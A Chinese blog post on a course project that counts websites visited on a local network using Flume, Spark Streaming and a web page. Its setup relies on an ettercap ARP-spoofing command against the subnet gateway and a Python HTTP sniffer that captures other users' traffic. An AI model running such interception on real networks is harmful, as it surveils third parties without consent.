一个关于spark streaming+flume的小应用

最新推荐文章于 2024-07-03 09:44:58 发布
最新推荐文章于 2024-07-03 09:44:58 发布
阅读量875 收藏
点赞数
分类专栏: 课程作业 文章标签: spark streaming flume http抓包 arp欺骗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/youb11/article/details/46715913
版权

这是这个学期的分布式课程是小作业,虽然期末展示的时候被老师说这个小应用与分布式没多大关系,不管怎样也是花时间做的,所以拿出来分享一下。

我这个应用是来统计一个网段某段时间内的网络访问情况,统计访问了哪些网站已经访问的频率。

1.前期准备

我是在Ubuntu上做的,安装的一些包有
apache-flume-1.5.2-bin.tar.gz   jdk-7u79-linux-x64.tar.gz  spark-1.3.1-bin-hadoop2.6.tgz
apache-maven-3.3.3-bin.tar.gz  hadoop-2.6.0.tar.gz          scala-2.11.6.tgz 
至于环境变量的配置,是参照 这个来的。

2.配置flume和spark

pom.xml的文件如下: 
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

	<groupId>flume</groupId>
    <artifactId>Flume-SparkStreaming</artifactId>
    <version>1.0</version>
    <packaging>jar</packaging>
    <dependencies>
        <dependency>
            <groupId>org.apache.spark</groupId>
            <artifactId>spark-core_2.10</artifactId>
            <version>1.3.1</version>
            <scope>provided</scope>
        </dependency>
        <dependency>
            <groupId>org.apache.spark</groupId>
            <artifactId>spark-streaming_2.10</artifactId>
            <version>1.3.1</version>
            <scope>provided</scope>
        </dependency>
		<dependency>
			<groupId>org.apache.spark</groupId>
			<artifactId>spark-streaming-flume_2.10</artifactId>
			<version>1.3.1</version>
		</dependency>
        <dependency>
            <groupId>org.json</groupId>
            <artifactId>json</artifactId>
            <version>20141113</version>
        </dependency>
    </dependencies>

    <build>
        <plugins>
            <plugin>
                <artifactId>maven-assembly-plugin</artifactId>
                <configuration>
                    <archive>
                        <manifest>
                            <mainClass></mainClass>
                        </manifest>
                    </archive>
                    <descriptorRefs>
                        <descriptorRef>jar-with-dependencies</descriptorRef>
                    </descriptorRefs>
                </configuration>
            </plugin>
        </plugins>
    </build>
</project>

flume-conf.properties文件: 
#netcat to avro
# Name the components on this agent
a2.sources = r2
a2.sinks = k2
a2.channels = c2

# Describe/configure the source
a2.sources.r2.type = netcat
a2.sources.r2.bind = localhost
a2.sources.r2.port = 44444

# Describe the sink
a2.sinks.k2.type = avro
a2.sinks.k2.hostname = localhost
a2.sinks.k2.port = 42424

# Use a channel which buffers events in memory
a2.channels.c2.type = memory
a2.channels.c2.capacity = 1000
a2.channels.c2.transactionCapacity = 100

# Bind the source and sink to the channel
a2.sources.r2.channels = c2
a2.sinks.k2.channel = c2

关于一些参数的解释官网上都有,我就不乱说了。

在spark的conf文件夹下,记得要让log4j.properties, slaves文件生效,就是把后面的.template去掉。
log4j.properties的内容如下: 
# Set everything to be logged to the console
log4j.rootCategory=ERROR, console
log4j.appender.console=org.apache.log4j.ConsoleAppender
log4j.appender.console.target=System.err
log4j.appender.console.layout=org.apache.log4j.PatternLayout
log4j.appender.console.layout.ConversionPattern=%d{yy/MM/dd HH:mm:ss} %p %c{1}: %m%n

# Settings to quiet third party logs that are too verbose
log4j.logger.org.eclipse.jetty=WARN
log4j.logger.org.eclipse.jetty.util.component.AbstractLifeCycle=ERROR
log4j.logger.org.apache.spark.repl.SparkIMain$exprTyper=INFO
log4j.logger.org.apache.spark.repl.SparkILoop$SparkILoopInterpreter=INFO

3.arp欺骗

使用Ettercap工具,具体参考点 这里
使用的指令为:
sudo ettercap -i eth0 -Tq -M arp:remote //172.18.217.254/     
这里172.18.217.254是我这个网段的网关

4.http抓包

这个程序网上有,稍微修改了一下为了满足我这个应用的需求 
#!/usr/bin/env python
import pcap
import dpkt
import re
import socket

mysock = socket.socket()
mysock.connect(('localhost',44444))

def match(pre, line):
    p = re.compile(pre)
    m = p.match(line)
    return m

def main_pcap(p_time, p_data):
    out_format = "%s\t%s\t%s\t%s\t%s\tHTTP/%s"
    p = dpkt.ethernet.Ethernet(p_data)
    ret = None
    if p.data.__class__.__name__ == 'IP':
        ip_data = p.data
        src_ip = '%d.%d.%d.%d' % tuple(map(ord,list(ip_data.src)))
        dst_ip = '%d.%d.%d.%d' % tuple(map(ord,list(ip_data.dst)))
        if p.data.data.__class__.__name__=='TCP':
            tcp_data = p.data.data
            if tcp_data.dport==80:
                if tcp_data.data:
                    try:
                        h = dpkt.http.Request(tcp_data.data)
                    except dpkt.UnpackError:
                        return
                    pre = "^/.*$"
                    http_headers = h.headers
                    host = h.headers['host']
                    url = host
                    # datetime srcip dstip GET /index.htm HTTP/1.1
                    ret = out_format % (p_time, src_ip, dst_ip, h.method, url, h.version)
                    mysock.send(url)
                    mysock.send("\n")
    return ret

def main():
    pc=pcap.pcap()
    print '1111'
    pc.setfilter('tcp port 80')
    for p_time, p_data in pc:
        ret = main_pcap(p_time, p_data)
        if ret:
            print ret

if __name__ == '__main__':
    main()

5.spark中的程序

主要功能就是词频统计,然后将结果输出为json格式的数据 
/*
 * Licensed to the Apache Software Foundation (ASF) under one or more
 * contributor license agreements.  See the NOTICE file distributed with
 * this work for additional information regarding copyright ownership.
 * The ASF licenses this file to You under the Apache License, Version 2.0
 * (the "License"); you may not use this file except in compliance with
 * the License.  You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

//package org.apache.spark.examples.streaming;

import org.apache.spark.SparkConf;
import org.apache.spark.api.java.function.Function;
import org.apache.spark.streaming.*;
import org.apache.spark.streaming.api.java.*;
import org.apache.spark.streaming.flume.FlumeUtils;
import org.apache.spark.streaming.flume.SparkFlumeEvent;
import org.apache.spark.api.java.function.*;
import org.apache.spark.api.java.JavaPairRDD;

import scala.Tuple2;

import java.util.List;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileWriter;
import org.json.JSONException;
import org.json.JSONStringer;
import org.json.JSONObject;

public final class JavaFlumeEventCount {
  private JavaFlumeEventCount() {
  }
	public static void outputToJson(List<Tuple2<String, Integer>> listOfResults, String outputPath) {
		JSONStringer IpJson = new JSONStringer();
		IpJson.array();
		for (Tuple2<String, Integer> item : listOfResults) {
			IpJson.object();
			IpJson.key("Domain").value(item._1);
			IpJson.key("Count").value(item._2);

			IpJson.endObject();
		}
		IpJson.endArray();
		try {
			File outputFile = new File(outputPath);
			if (!outputFile.exists()) {
				outputFile.createNewFile();
			}
			FileWriter fw = new FileWriter(outputFile);
			BufferedWriter outBuffer = new BufferedWriter(fw);
			outBuffer.write(IpJson.toString());
			outBuffer.flush();
			outBuffer.close();
		} catch (Exception e) {
			e.printStackTrace();
		}
	}
	
  public static void main(String[] args) {
    if (args.length != 3) {
      System.err.println("Usage: JavaFlumeEventCount <host> <port> <Output Path>");
      System.exit(1);
    }
    String host = args[0];
    int port = Integer.parseInt(args[1]);
	final String outputPath = args[2];
    Duration batchInterval = new Duration(2000);
    SparkConf sparkConf = new SparkConf().setAppName("JavaFlumeEventCount");
    JavaStreamingContext ssc = new JavaStreamingContext(sparkConf, batchInterval);
    JavaReceiverInputDStream<SparkFlumeEvent> flumeStream = FlumeUtils.createStream(ssc, host, port);
	
	//use to print
	flumeStream.map(
		new Function<SparkFlumeEvent, String> () {
			@Override 
			public String call(SparkFlumeEvent flumeEvent) {
				return "Flume Event: " + flumeEvent.event().toString();
			}
		}
	).print();

	//map
	JavaPairDStream<String, Integer> ipMap = flumeStream.mapToPair(
		new PairFunction<SparkFlumeEvent, String, Integer>() {
			@Override
			public Tuple2<String, Integer> call(SparkFlumeEvent flumeEvent) {

				JSONObject jsonobj = new JSONObject(flumeEvent.event().toString());
				JSONObject jsonobj_body = new JSONObject(jsonobj.getString("body"));
				String domain = jsonobj_body.getString("bytes");

				Tuple2<String, Integer> result = new Tuple2<String, Integer> (domain, 1);

				return result;
		}
	});

	//reduce
	JavaPairDStream<String, Integer> ipReduce = ipMap.reduceByKeyAndWindow(
		new Function2<Integer, Integer, Integer> (){
			@Override
			public Integer call(Integer c1, Integer c2) {

				return c1 + c2;
			}
	}, new Duration(4000), new Duration(4000));

	//output
	ipReduce.foreachRDD(new Function<JavaPairRDD<String, Integer>, Void>() {
		@Override
		public Void call(JavaPairRDD<String, Integer> rdd) {
			List<Tuple2<String, Integer>> listOfResults = rdd.collect();
			
			outputToJson(listOfResults, outputPath);

			return null;
		}
	});
    ssc.start();
  }
}

因为我将 
package org.apache.spark.examples.streaming;
这句注释掉了所以该程序不用放在很深的文件夹内了
/code/src/main/java/***.java
而且上面的抓包程序和pom.xml都放在code/下

6.网页展示

这段代码网上有,随便改了一下 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>getJSON获取数据</title>
<script type="text/javascript" src="js/jquery-1.8.2.min.js"></script>
<style type="text/css">
 #divframe{ border:1px solid #999; width:500px; margin:0 auto;}
 .loadTitle{ background:#CCC; height:30px;}
</style>
<script type="text/javascript">
$(function(){
	$("#btn").click(function(){
        $.getJSON("IpCount.json",function(data){
			var $jsontip = $("#jsonTip");
			var strHtml = "";//存储数据的变量
			$jsontip.empty();//清空内容
			$.each(data,function(infoIndex,info){
				  strHtml += "Domain:"+info["Domain"]+"<br>";
				  strHtml += "Count:"+info["Count"]+"<br>";
				  strHtml += "<hr>"
				})
			$jsontip.html(strHtml);//显示处理后的数据	
			})
		})
	})
</script>
</head>

<body>
<div id="divframe">
  <div class="loadTitle">
    <input type="button" value="获取数据" id="btn"/>
  </div>
  <div id="jsonTip">
  </div>
</div>
</body>
</html>

7.运行

arp欺骗:
sudo ettercap -i eth0 -Tq -M arp:remote //172.18.217.254/ 

spark运行:
#!/usr/bin/env bash
spark-submit --class JavaFlumeEventCount target/Flume-SparkStreaming-1.0-jar-with-dependencies.jar localhost 42424 ../package/tomcat7/webapps/examples/IpCount.json

flume运行:
#!/usr/bin/env bash
flume-ng agent --conf /usr/local/flume/conf/ --conf-file /usr/local/flume/conf/flume-conf.properties --name a2 -Dflume.root.logger=INFO,console

http抓包:
sudo python http.py

最后访问那个网页就能看到结果了


要个男盆友扭蛋
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SpringBoot 整合 FreeMarker 步骤及问题详解
成长笔记
07-29 1112
pom文件引入依赖: <!--freemarker--> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-freemarker</artifactId> </dependency> yml配置: spring: datasource: driver-class-name: com
kafka 的pom文件_spring-cloud-stream结合kafka使用详解
weixin_39980002的博客
12-19 242
1.pom文件导入依赖org.springframework.cloudspring-cloud-stream-binder-kafka2.application.yml文件配置spring:cloud:stream:kafka:binder:brokers: xxx.xxx.xxx.xx:xxxx // Kafka的消息中间件服务器地址bindings:xxx_output: // 通道名称de...
古老的技术栈:struts2+maven+freemaker+jsp,主要为了学习freemaker模板引擎
qq_40564810的博客
12-31 108
关于freemaker的使用 一.简介 略 二.使用 引入对应的依赖 <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/
避免代码提交时项目pom.xml含有不同的本地路径
a1508415087的博客
08-10 448
为避免代码提交时项目pom.xml里的profile(Liferay-v6.2-CE-(Tomcat-7))含有不同的本地路径,把pom.xml里的profiles移到本地目录下的${user.home}/.m2/settings.xml   注:路径请换成你的本地对应路径 &lt;settings xmlns="http://maven.apache.org/POM/4.0.0" xmln...
Spark学习笔记-Streaming集成Flume
PURSUE ONE PIECE
11-01 6871
基于推模式的: 基于拉模式的:
sparkstreaming+flume+kafka实时流式处理完整流程
Ma_in.的博客
12-05 3473
sparkstreaming+flume+kafka实时流式处理完整流程 ​ 一、前期准备 1、环境准备,四台测试服务器 spark集群三台,hadoop02,hadoop03,hadoop04 kafka集群三台,hadoop02,hadoop03,hadoop04 zookeeper集群三台,hadoop02,hadoop03,hadoop04 日志接收服务器, hadoop02 日志收集流程: 日志收集服务...
SparkStreamingSpark Streaming + Flume + Kafka + HBase + Hadoop + Zookeeper实现实时日志分析统计; SpringBoot + Echarts实现数据可视化展示
02-05
生成的数据主要是模拟某学习网站学习视频课程的访问量(其中*以“ / class”开头的表示实战课程,然后通过流水线Flume + Kafka + SparkStreaming进行实时日志的收集,HBase来存储数据)*注意事项(使用的软件工具及...
本科毕业设计项目,基于spark streaming+flume+kafka+hbase的实时日志处理分析系统,大数据处理技术
06-20
本科毕业设计项目,基于spark streaming+flume+kafka+hbase的实时日志处理分析系统 基于spark streaming+flume+kafka+hbase的实时日志处理分析系统 本科毕业设计项目,基于spark streaming+flume+kafka+hbase的...
基于spark streaming+flume+kafka+hbase的实时日志处理分析系统源码.zip
04-12
基于spark streaming+flume+kafka+hbase的实时日志处理分析系统源码(分控制台版本和Web UI可视化版本).zip基于spark streaming+flume+kafka+hbase的实时日志处理分析系统源码(分控制台版本和Web UI可视化版本).zip...
基于spark streaming+flume+kafka+hbase的实时日志处理分析系统.zip
03-14
本项目"基于spark streaming+flume+kafka+hbase的实时日志处理分析系统"结合了多个关键技术,构建了一个高效、实时的数据处理流水线。下面将详细阐述这些技术及其在系统中的作用。 1. Spark StreamingSpark ...
基于spark streaming+flume+kafka+hbase的实时日志处理分析系统+源代码+文档说明
12-28
1、资源内容:基于spark streaming+flume+kafka+hbase的实时日志处理分析系统(分为控制台版本和基于springboot、Echarts等的Web UI可视化版本) 2、代码特点:内含运行结果,不会运行可私信,参数化编程、参数可方便...
Spark spark分析数据的过程,案例网站日志统计用户访问时间
一只菜鸡
08-01 1775
第一步、数据的读取(输入)   将要处理的数据读取封装到一个集合RDD中(类别Scala中List列表)   val inputRDD = sc.textFile(‘…”) 第二步、数据处理(分析)   调用集合RDD中函数(高阶函数)进行处理分析   RDD –>函数 ->另外一个RDD :transformation函数   val outpuRDD = inputRDD.#(#:...
黑猴子的家:Flume 案例 flume -> spark streaming
黑猴子的博客
09-30 106
flumespark streaming 案例不作过多详解,具体细节将在spark streaming 章节细讲,在此只附上CodeCode -&gt; GitHubhttps://github.com/liufengji/spark_flume.git 1、flume-push-sparkstreaming.conf # Name the components on this age...
133.Spark大型电商项目-用户活跃度分析模块-统计指定时间内访问次数最多的10个用户
someby的博客
08-05 1342
本篇文章记录统计指定时间内访问次数最多的10个用户,使用SparkSession来分析数据。 代码 UserActiveDegreeAnalyze.scala package graduation.scala.spark import org.apache.spark.SparkConf import org.apache.spark.sql.SparkSession /** ...
基于Hadoop平台的电信客服数据的处理与分析③项目开发:搭建Flume大数据开发环境---任务14:Flume安装部署
qq_60872637的博客
07-03 420
任务内容为安装和配置Flume,并测试收集流式数据。
Crypto_30_vHsm_Types.h
07-09
Crypto_30_vHsm_Types
vmware虚拟机安装教程.pdf
最新发布
07-10
VMware虚拟机安装教程是一个详细且系统的过程,涵盖了从下载、安装到配置虚拟机的多个步骤。以下是一个详尽的VMware虚拟机安装教程,旨在帮助用户顺利搭建自己的虚拟环境。
11111111111
07-10
11111111111
nvidia平台torch-2.0.0.nv23.05-cp38-cp38-linux-aarch64安装包
07-09
特定版本的 PyTorch 包,专为 NVIDIA 的 Jetson 平台优化,并且适用于使用 Python 3.8 的 ARM64 架构(如 NVIDIA Jetson 系列设备)上的 Linux 操作系统 PyTorch 是一个广泛使用的开源机器学习库,主要用于深度学习和神经网络的构建和训练。它由 Facebook's AI Research Lab (FAIR) 开发和维护。 提供了强大的张量计算功能以及支持 GPU 加速的计算能力。
python爬虫等获取实时数据+flume+kafka+spark streaming+mysql+echarts
09-13
Spark Streaming是Apache Spark一个子项目,它允许在实时流数据中进行高效的流处理。Spark Streaming可以与Kafka等数据源集成,以实时的方式处理来自不同源的数据,并进行转换、分析和存储。 MySQL是一种关系型...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值